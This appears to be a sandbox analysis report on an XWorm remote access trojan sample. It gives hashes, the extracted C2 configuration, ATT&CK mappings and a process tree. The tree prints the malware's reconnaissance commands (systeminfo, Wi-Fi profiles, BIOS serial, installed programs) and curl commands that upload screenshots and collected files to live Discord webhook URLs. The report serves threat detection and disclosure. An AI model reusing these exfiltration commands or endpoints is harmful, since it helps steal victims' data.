xworm | f89b32f063ca4ecf3aa5ae2d30d5d7bb8a1643571964e9f24ef1f079b8c69fba

Analysis

max time kernel
1653s
max time network
1791s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
29/08/2024, 15:15

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

aplikacja.exe
Size

33KB
MD5

eb3e27f143eedc4ce49fb606770349cb
SHA1

fc20ee5c10922eb57fcde504f05b17a8427aee55
SHA256

f89b32f063ca4ecf3aa5ae2d30d5d7bb8a1643571964e9f24ef1f079b8c69fba
SHA512

675dbb90a4fa7c43aefd77793418befe02c51b7a0d7bf36d16d82865a6f25e3b342f12be5419f3b97ca9461d5de0982a88ff7aacf290b62b3d6fa372b5e5e4ea
SSDEEP

384:Gl+PkjD9+E5MFs7iui8L7zoM42pfL3iB7OxVqWYRApkFXBLTsOZwpGN2v99IkuiS:m+CD93W03F42JiB706VF49j1OjhPbN

Score

10^/10

xworm discovery execution persistence privilege_escalation rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

lefferek-42016.portmap.host:42016

Mutex

o6LSoD6nQl6RkE3M

Attributes

install_file
USB.exe

aes.plain

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1278406114043756625/X3hg4L21JsPT4kBcJpGPLLxDj1S410xImI5RQrY_qvRfluZplyFZmHmY1Au5dFReZmfp

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1278406114043756625/X3hg4L21JsPT4kBcJpGPLLxDj1S410xImI5RQrY_qvRfluZplyFZmHmY1Au5dFReZmfp

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1278738532608774258/HOZrmzJTKCkHRT1MjdQWhvvUek5W2VT1OaU8s2YaPQ1iUwku2rBzN7uMtM03HTC56Ss7

Extracted

Language

ps1

Source

URLs

exe.dropper

https://discord.com/api/webhooks/1278738532608774258/HOZrmzJTKCkHRT1MjdQWhvvUek5W2VT1OaU8s2YaPQ1iUwku2rBzN7uMtM03HTC56Ss7

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4760-1-0x0000000000DD0000-0x0000000000DDE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
54	2344	powershell.exe
97	2104	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 19 IoCs

Web Service

T1102

flow	ioc
17	discord.com
33	discord.com
70	discord.com
97	discord.com
20	discord.com
38	discord.com
43	discord.com
54	discord.com
64	discord.com
85	discord.com
90	discord.com
11	discord.com
47	discord.com
75	discord.com
81	discord.com
27	discord.com
53	discord.com
63	discord.com
96	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	myexternalip.com
8	myexternalip.com
61	myexternalip.com

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2104	powershell.exe
1152	powershell.exe
2028	powershell.exe
2344	powershell.exe
2584	powershell.exe
1096	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2504	cmd.exe
4868	netsh.exe
3944	cmd.exe
2700	netsh.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2792	timeout.exe
3076	timeout.exe

Gathers network information 2 TTPs 4 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2436	NETSTAT.EXE
728	ipconfig.exe
4960	NETSTAT.EXE
700	ipconfig.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2844	systeminfo.exe
4572	systeminfo.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1152	powershell.exe
1152	powershell.exe
2028	powershell.exe
2028	powershell.exe
2344	powershell.exe
2344	powershell.exe
2584	powershell.exe
2584	powershell.exe
1096	powershell.exe
1096	powershell.exe
2104	powershell.exe
2104	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4760	aplikacja.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4760	aplikacja.exe
Token: SeDebugPrivilege	1152	powershell.exe
Token: SeIncreaseQuotaPrivilege	248	WMIC.exe
Token: SeSecurityPrivilege	248	WMIC.exe
Token: SeTakeOwnershipPrivilege	248	WMIC.exe
Token: SeLoadDriverPrivilege	248	WMIC.exe
Token: SeSystemProfilePrivilege	248	WMIC.exe
Token: SeSystemtimePrivilege	248	WMIC.exe
Token: SeProfSingleProcessPrivilege	248	WMIC.exe
Token: SeIncBasePriorityPrivilege	248	WMIC.exe
Token: SeCreatePagefilePrivilege	248	WMIC.exe
Token: SeBackupPrivilege	248	WMIC.exe
Token: SeRestorePrivilege	248	WMIC.exe
Token: SeShutdownPrivilege	248	WMIC.exe
Token: SeDebugPrivilege	248	WMIC.exe
Token: SeSystemEnvironmentPrivilege	248	WMIC.exe
Token: SeRemoteShutdownPrivilege	248	WMIC.exe
Token: SeUndockPrivilege	248	WMIC.exe
Token: SeManageVolumePrivilege	248	WMIC.exe
Token: 33	248	WMIC.exe
Token: 34	248	WMIC.exe
Token: 35	248	WMIC.exe
Token: 36	248	WMIC.exe
Token: SeIncreaseQuotaPrivilege	248	WMIC.exe
Token: SeSecurityPrivilege	248	WMIC.exe
Token: SeTakeOwnershipPrivilege	248	WMIC.exe
Token: SeLoadDriverPrivilege	248	WMIC.exe
Token: SeSystemProfilePrivilege	248	WMIC.exe
Token: SeSystemtimePrivilege	248	WMIC.exe
Token: SeProfSingleProcessPrivilege	248	WMIC.exe
Token: SeIncBasePriorityPrivilege	248	WMIC.exe
Token: SeCreatePagefilePrivilege	248	WMIC.exe
Token: SeBackupPrivilege	248	WMIC.exe
Token: SeRestorePrivilege	248	WMIC.exe
Token: SeShutdownPrivilege	248	WMIC.exe
Token: SeDebugPrivilege	248	WMIC.exe
Token: SeSystemEnvironmentPrivilege	248	WMIC.exe
Token: SeRemoteShutdownPrivilege	248	WMIC.exe
Token: SeUndockPrivilege	248	WMIC.exe
Token: SeManageVolumePrivilege	248	WMIC.exe
Token: 33	248	WMIC.exe
Token: 34	248	WMIC.exe
Token: 35	248	WMIC.exe
Token: 36	248	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4668	WMIC.exe
Token: SeSecurityPrivilege	4668	WMIC.exe
Token: SeTakeOwnershipPrivilege	4668	WMIC.exe
Token: SeLoadDriverPrivilege	4668	WMIC.exe
Token: SeSystemProfilePrivilege	4668	WMIC.exe
Token: SeSystemtimePrivilege	4668	WMIC.exe
Token: SeProfSingleProcessPrivilege	4668	WMIC.exe
Token: SeIncBasePriorityPrivilege	4668	WMIC.exe
Token: SeCreatePagefilePrivilege	4668	WMIC.exe
Token: SeBackupPrivilege	4668	WMIC.exe
Token: SeRestorePrivilege	4668	WMIC.exe
Token: SeShutdownPrivilege	4668	WMIC.exe
Token: SeDebugPrivilege	4668	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4668	WMIC.exe
Token: SeRemoteShutdownPrivilege	4668	WMIC.exe
Token: SeUndockPrivilege	4668	WMIC.exe
Token: SeManageVolumePrivilege	4668	WMIC.exe
Token: 33	4668	WMIC.exe
Token: 34	4668	WMIC.exe
Token: 35	4668	WMIC.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2028	powershell.exe
2028	powershell.exe
1096	powershell.exe
1096	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4760 wrote to memory of 3320	4760	aplikacja.exe	83
PID 4760 wrote to memory of 3320	4760	aplikacja.exe	83
PID 3320 wrote to memory of 960	3320	cmd.exe	85
PID 3320 wrote to memory of 960	3320	cmd.exe	85
PID 960 wrote to memory of 2208	960	net.exe	86
PID 960 wrote to memory of 2208	960	net.exe	86
PID 3320 wrote to memory of 2312	3320	cmd.exe	87
PID 3320 wrote to memory of 2312	3320	cmd.exe	87
PID 3320 wrote to memory of 1152	3320	cmd.exe	88
PID 3320 wrote to memory of 1152	3320	cmd.exe	88
PID 3320 wrote to memory of 248	3320	cmd.exe	89
PID 3320 wrote to memory of 248	3320	cmd.exe	89
PID 3320 wrote to memory of 4668	3320	cmd.exe	91
PID 3320 wrote to memory of 4668	3320	cmd.exe	91
PID 3320 wrote to memory of 1044	3320	cmd.exe	92
PID 3320 wrote to memory of 1044	3320	cmd.exe	92
PID 3320 wrote to memory of 4572	3320	cmd.exe	93
PID 3320 wrote to memory of 4572	3320	cmd.exe	93
PID 3320 wrote to memory of 4580	3320	cmd.exe	95
PID 3320 wrote to memory of 4580	3320	cmd.exe	95
PID 3320 wrote to memory of 2504	3320	cmd.exe	96
PID 3320 wrote to memory of 2504	3320	cmd.exe	96
PID 2504 wrote to memory of 4868	2504	cmd.exe	97
PID 2504 wrote to memory of 4868	2504	cmd.exe	97
PID 3320 wrote to memory of 728	3320	cmd.exe	98
PID 3320 wrote to memory of 728	3320	cmd.exe	98
PID 3320 wrote to memory of 4960	3320	cmd.exe	99
PID 3320 wrote to memory of 4960	3320	cmd.exe	99
PID 3320 wrote to memory of 2792	3320	cmd.exe	100
PID 3320 wrote to memory of 2792	3320	cmd.exe	100
PID 3320 wrote to memory of 2028	3320	cmd.exe	101
PID 3320 wrote to memory of 2028	3320	cmd.exe	101
PID 2028 wrote to memory of 444	2028	powershell.exe	102
PID 2028 wrote to memory of 444	2028	powershell.exe	102
PID 3320 wrote to memory of 276	3320	cmd.exe	103
PID 3320 wrote to memory of 276	3320	cmd.exe	103
PID 3320 wrote to memory of 4856	3320	cmd.exe	104
PID 3320 wrote to memory of 4856	3320	cmd.exe	104
PID 3320 wrote to memory of 1052	3320	cmd.exe	105
PID 3320 wrote to memory of 1052	3320	cmd.exe	105
PID 3320 wrote to memory of 224	3320	cmd.exe	106
PID 3320 wrote to memory of 224	3320	cmd.exe	106
PID 3320 wrote to memory of 3968	3320	cmd.exe	107
PID 3320 wrote to memory of 3968	3320	cmd.exe	107
PID 3320 wrote to memory of 3280	3320	cmd.exe	108
PID 3320 wrote to memory of 3280	3320	cmd.exe	108
PID 3320 wrote to memory of 3200	3320	cmd.exe	109
PID 3320 wrote to memory of 3200	3320	cmd.exe	109
PID 3320 wrote to memory of 1640	3320	cmd.exe	110
PID 3320 wrote to memory of 1640	3320	cmd.exe	110
PID 3320 wrote to memory of 2344	3320	cmd.exe	111
PID 3320 wrote to memory of 2344	3320	cmd.exe	111
PID 4760 wrote to memory of 4748	4760	aplikacja.exe	113
PID 4760 wrote to memory of 4748	4760	aplikacja.exe	113
PID 4748 wrote to memory of 664	4748	cmd.exe	115
PID 4748 wrote to memory of 664	4748	cmd.exe	115
PID 664 wrote to memory of 4676	664	net.exe	116
PID 664 wrote to memory of 4676	664	net.exe	116
PID 4748 wrote to memory of 2648	4748	cmd.exe	117
PID 4748 wrote to memory of 2648	4748	cmd.exe	117
PID 4748 wrote to memory of 2584	4748	cmd.exe	118
PID 4748 wrote to memory of 2584	4748	cmd.exe	118
PID 4748 wrote to memory of 1472	4748	cmd.exe	119
PID 4748 wrote to memory of 1472	4748	cmd.exe	119

C:\Users\Admin\AppData\Local\Temp\aplikacja.exe
"C:\Users\Admin\AppData\Local\Temp\aplikacja.exe"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rzcztg.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3320
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:960
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:2208
- - C:\Windows\system32\curl.exe
    curl -o C:\Users\Admin\AppData\Local\Temp\ipp.txt https://myexternalip.com/raw
    3⤵
    PID:2312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\AppData\Local\Temp\programms.txt "
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1152
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get size
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:248
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get serialnumber
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get name
    3⤵
    PID:1044
- - C:\Windows\system32\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:4572
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:4580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh wlan show profile
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:2504
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4868
- - C:\Windows\system32\ipconfig.exe
    ipconfig /all
    3⤵
    - Gathers network information
    PID:728
- - C:\Windows\system32\NETSTAT.EXE
    netstat -an
    3⤵
    - Gathers network information
    PID:4960
- - C:\Windows\system32\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:2792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -executionpolicy remotesigned -File C:\Users\Admin\AppData\Local\Temp\test.ps1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2028
  - - C:\Windows\system32\curl.exe
      "C:\Windows\system32\curl.exe" -i -F file=@C:\Users\Admin\AppData\Local\Temp\Admin_Capture.jpg https://discord.com/api/webhooks/1278406114043756625/X3hg4L21JsPT4kBcJpGPLLxDj1S410xImI5RQrY_qvRfluZplyFZmHmY1Au5dFReZmfp
      4⤵
      PID:444
- - C:\Windows\system32\curl.exe
    curl -X POST -H "Content-type: application/json" --data "{\"content\": \"```User = Admin Ip = 194.110.13.70 time = 15:25:56.41 date = Thu 08/29/2024 os = Windows_NT Computername = LBPSYPUR ```\"}" https://discord.com/api/webhooks/1278406114043756625/X3hg4L21JsPT4kBcJpGPLLxDj1S410xImI5RQrY_qvRfluZplyFZmHmY1Au5dFReZmfp
    3⤵
    PID:276
- - C:\Windows\system32\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\System_INFO.txt https://discord.com/api/webhooks/1278406114043756625/X3hg4L21JsPT4kBcJpGPLLxDj1S410xImI5RQrY_qvRfluZplyFZmHmY1Au5dFReZmfp
    3⤵
    PID:4856
- - C:\Windows\system32\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\sysi.txt https://discord.com/api/webhooks/1278406114043756625/X3hg4L21JsPT4kBcJpGPLLxDj1S410xImI5RQrY_qvRfluZplyFZmHmY1Au5dFReZmfp
    3⤵
    PID:1052
- - C:\Windows\system32\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\ip.txt https://discord.com/api/webhooks/1278406114043756625/X3hg4L21JsPT4kBcJpGPLLxDj1S410xImI5RQrY_qvRfluZplyFZmHmY1Au5dFReZmfp
    3⤵
    PID:224
- - C:\Windows\system32\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\netstat.txt https://discord.com/api/webhooks/1278406114043756625/X3hg4L21JsPT4kBcJpGPLLxDj1S410xImI5RQrY_qvRfluZplyFZmHmY1Au5dFReZmfp
    3⤵
    PID:3968
- - C:\Windows\system32\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\programms.txt https://discord.com/api/webhooks/1278406114043756625/X3hg4L21JsPT4kBcJpGPLLxDj1S410xImI5RQrY_qvRfluZplyFZmHmY1Au5dFReZmfp
    3⤵
    PID:3280
- - C:\Windows\system32\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\uuid.txt https://discord.com/api/webhooks/1278406114043756625/X3hg4L21JsPT4kBcJpGPLLxDj1S410xImI5RQrY_qvRfluZplyFZmHmY1Au5dFReZmfp
    3⤵
    PID:3200
- - C:\Windows\system32\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\wlan.txt https://discord.com/api/webhooks/1278406114043756625/X3hg4L21JsPT4kBcJpGPLLxDj1S410xImI5RQrY_qvRfluZplyFZmHmY1Au5dFReZmfp
    3⤵
    PID:1640
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -executionpolicy remotesigned -File C:\Users\Admin\AppData\Local\Temp\testtttt.ps1
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kimygh.cmd" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4748
- - C:\Windows\system32\net.exe
    net session
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:664
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:4676
- - C:\Windows\system32\curl.exe
    curl -o C:\Users\Admin\AppData\Local\Temp\ipp.txt https://myexternalip.com/raw
    3⤵
    PID:2648
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\AppData\Local\Temp\programms.txt "
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic diskdrive get size
    3⤵
    PID:1472
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic bios get serialnumber
    3⤵
    PID:228
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get name
    3⤵
    PID:1896
- - C:\Windows\system32\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:2844
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    PID:4752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh wlan show profile
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3944
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2700
- - C:\Windows\system32\ipconfig.exe
    ipconfig /all
    3⤵
    - Gathers network information
    PID:700
- - C:\Windows\system32\NETSTAT.EXE
    netstat -an
    3⤵
    - Gathers network information
    PID:2436
- - C:\Windows\system32\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:3076
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -executionpolicy remotesigned -File C:\Users\Admin\AppData\Local\Temp\test.ps1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:1096
  - - C:\Windows\system32\curl.exe
      "C:\Windows\system32\curl.exe" -i -F file=@C:\Users\Admin\AppData\Local\Temp\Admin_Capture.jpg https://discord.com/api/webhooks/1278738532608774258/HOZrmzJTKCkHRT1MjdQWhvvUek5W2VT1OaU8s2YaPQ1iUwku2rBzN7uMtM03HTC56Ss7
      4⤵
      PID:3324
- - C:\Windows\system32\curl.exe
    curl -X POST -H "Content-type: application/json" --data "{\"content\": \"```User = Admin Ip = 194.110.13.70 time = 15:43:39.81 date = Thu 08/29/2024 os = Windows_NT Computername = LBPSYPUR ```\"}" https://discord.com/api/webhooks/1278738532608774258/HOZrmzJTKCkHRT1MjdQWhvvUek5W2VT1OaU8s2YaPQ1iUwku2rBzN7uMtM03HTC56Ss7
    3⤵
    PID:4604
- - C:\Windows\system32\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\System_INFO.txt https://discord.com/api/webhooks/1278738532608774258/HOZrmzJTKCkHRT1MjdQWhvvUek5W2VT1OaU8s2YaPQ1iUwku2rBzN7uMtM03HTC56Ss7
    3⤵
    PID:2728
- - C:\Windows\system32\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\sysi.txt https://discord.com/api/webhooks/1278738532608774258/HOZrmzJTKCkHRT1MjdQWhvvUek5W2VT1OaU8s2YaPQ1iUwku2rBzN7uMtM03HTC56Ss7
    3⤵
    PID:3660
- - C:\Windows\system32\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\ip.txt https://discord.com/api/webhooks/1278738532608774258/HOZrmzJTKCkHRT1MjdQWhvvUek5W2VT1OaU8s2YaPQ1iUwku2rBzN7uMtM03HTC56Ss7
    3⤵
    PID:1180
- - C:\Windows\system32\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\netstat.txt https://discord.com/api/webhooks/1278738532608774258/HOZrmzJTKCkHRT1MjdQWhvvUek5W2VT1OaU8s2YaPQ1iUwku2rBzN7uMtM03HTC56Ss7
    3⤵
    PID:1416
- - C:\Windows\system32\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\programms.txt https://discord.com/api/webhooks/1278738532608774258/HOZrmzJTKCkHRT1MjdQWhvvUek5W2VT1OaU8s2YaPQ1iUwku2rBzN7uMtM03HTC56Ss7
    3⤵
    PID:1076
- - C:\Windows\system32\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\uuid.txt https://discord.com/api/webhooks/1278738532608774258/HOZrmzJTKCkHRT1MjdQWhvvUek5W2VT1OaU8s2YaPQ1iUwku2rBzN7uMtM03HTC56Ss7
    3⤵
    PID:1792
- - C:\Windows\system32\curl.exe
    curl -i -H 'Expect: application/json' -F file=@C:\Users\Admin\AppData\Local\Temp\wlan.txt https://discord.com/api/webhooks/1278738532608774258/HOZrmzJTKCkHRT1MjdQWhvvUek5W2VT1OaU8s2YaPQ1iUwku2rBzN7uMtM03HTC56Ss7
    3⤵
    PID:3856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -executionpolicy remotesigned -File C:\Users\Admin\AppData\Local\Temp\testtttt.ps1
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2104

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
22e796539d05c5390c21787da1fb4c2b

SHA1
55320ebdedd3069b2aaf1a258462600d9ef53a58

SHA256
7c6c09f48f03421430d707d27632810414e5e2bf2eecd5eb675fecf8b45a9a92

SHA512
d9cc0cb22df56db72a71504bb3ebc36697e0a7a1d2869e0e0ab61349bda603298fe6c667737b79bf2235314fb49b883ba4c5f137d002e273e79391038ecf9c09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
badbe01993754b9eb8092ff1808b19b1

SHA1
418609114a1620b36fe8638c7e47d91c5ff65019

SHA256
9d5652ea5e3cddd141ca1296b5e2a6a4811881c2fe3c122ce9894ed4771ea97c

SHA512
1fc5a7c5081f8d2bad4efe7dbf7812ec44303b70b838ac50a26b793dbd519c10fc03e695915d0eaadd9e24e0ffecc11f1574a2d104cc46f9831ba0e0e775b0b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f600e7587a273dee9d00c58989e8a4ba

SHA1
b794e1829e764d57a5b223cb15019e97157a50e3

SHA256
c832bde2d60b9716e375da26d0fc2711cc64cc35eabc422342e7ea5177c392ea

SHA512
fbc53a068d4477612ded24edee007d1376ab19b80f0f9f74929310317b5af8e35057fa7bf365517d0477344df94e30330bd339a8a1c3ee4b567e8d617efe9c43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
87aa714e1b11aaf430623d2852dd6b1b

SHA1
2890fe791a2cdb51673b360f7e7ed1451e444d2d

SHA256
6316219293c6c9262486bc243a68def597f60981f18e094d9e8ad99b1d43963a

SHA512
0f106c468069450859118c86b78e7718ceaa4062aedad4db36042faeb6eeb12f8b237ace6274e454fcf157d47760e56fad86df0997ab0e35b7bbfe4b731b7af5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
25576035259de6d18a30380b1c4865d0

SHA1
0716b8653f1dd8889a53d57f56cce6f070d4c825

SHA256
48e2c95c2863ac7e4b600eb05cdece0e14f91920728a486c4410e392177441b3

SHA512
eb8c389388f740ce6ad84fe315b49cb3249fe72b6c6956aa494c0fb7e354509454b75ac1263e8260ae26bcb251b6183189168365e2fd14f71f44048c29d3a7d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2cae0ce73d32f1c1335a9e477f4940fc

SHA1
c5ece1418cdbd2b6aec0748bff1724ea7c6f3043

SHA256
531fe9490e22f1515800cb68a903efd599505cf9a377319bacc2daa79ccd973c

SHA512
dd969ecd46f9f7e01a0ad298e7af60f9b5197140e78a1e87d573831bc5880a727a1742a8643d81efcde21296dde9bcb23950f06cdaf19c7b70336ee9a414634b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Admin_Capture.jpg

Filesize
67KB

MD5
2179c698f90140a94e39c26e99c3376a

SHA1
b313a1273a37afeff5ab1f1f3b0582449a6d2f37

SHA256
42716161bfcd6c4cb12b3d3cdbd00c9224219fa8e06d94aabdbcd35cbca65c62

SHA512
928f3088d1751c38455d54be7689fa4d481049db66cb1b1737bdd05196cd342428b482c281f1cc9006e222ae56b52210b01c531b16859de2708dce94c12a00f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Admin_Capture.jpg

Filesize
64KB

MD5
8e92fdd4adc988c88257a39f95ea22a3

SHA1
566a0c17fc958269a3db6f6073f247178b5a9588

SHA256
5ed694a4595f0cfb54be95e7d69d911a15ec308b11c621e18d80729e2dba214e

SHA512
1e6c0510aaabcf619e6adceedf3c397e7affcdd6b007fd9f21e907dfec854310c0aa4fa9758cbfdb23d33c5d74184c2ed49fe30d17f3ec477dc92672d41e19fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\System_INFO.txt

Filesize
311B

MD5
533c630c2f09949235ff3d463041deff

SHA1
be73ac6c09729d9063001f2c05c61b8b816ff303

SHA256
734eb105772c9c6878017c9ab34fa0f4bb73e0142aab068b71161d28776c835c

SHA512
e0581b8b11175f5bc1aeada6be7772f7c889bf64ad40b7c87ad4feea536a96b875dd8d97f7ed5e791671f0453e70954eacdebb58cf667d5c9fdb33eff1221ca8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mbv3tyqt.1ap.ps1

